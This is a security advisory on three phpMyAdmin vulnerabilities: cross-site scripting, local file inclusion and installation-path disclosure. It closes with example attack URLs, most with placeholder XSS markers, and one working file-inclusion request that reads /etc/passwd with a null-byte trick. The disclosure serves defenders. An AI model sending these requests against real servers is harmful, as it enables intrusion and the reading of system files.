|
Description
|
|
Three vulnerabilities were identified in phpMyAdmin, which may be exploited by attackers to include arbitrary files, conduct Cross Site Scripting attacks or determine the installation path.
- The first flaw resides in the "select_server.lib.php", "display_tbl_links.lib.php", "theme_left.css.php" and "theme_right.css.php" files, when handling specially crafted "strServer", "cfg[BgcolorOne]", "trServerChoice", "bgcolor", "row_no", "left_font_family" and "right_font_family" parameters, which could be exploited to cause arbitrary scripting code to be executed by the user's browser.
- The second vulnerability is due to an input validation error in the "phpmyadmin.css.php" script when handling specially crafted "GLOBALS[cfg][ThemePath]" and "theme" parameters, which may be exploited to include local files.
- The third vulnerability is due to an input validation error in several scripts, which may be exploited by remote attackers to disclose the full installation path.
- Examples :
http://phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
http://phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
|
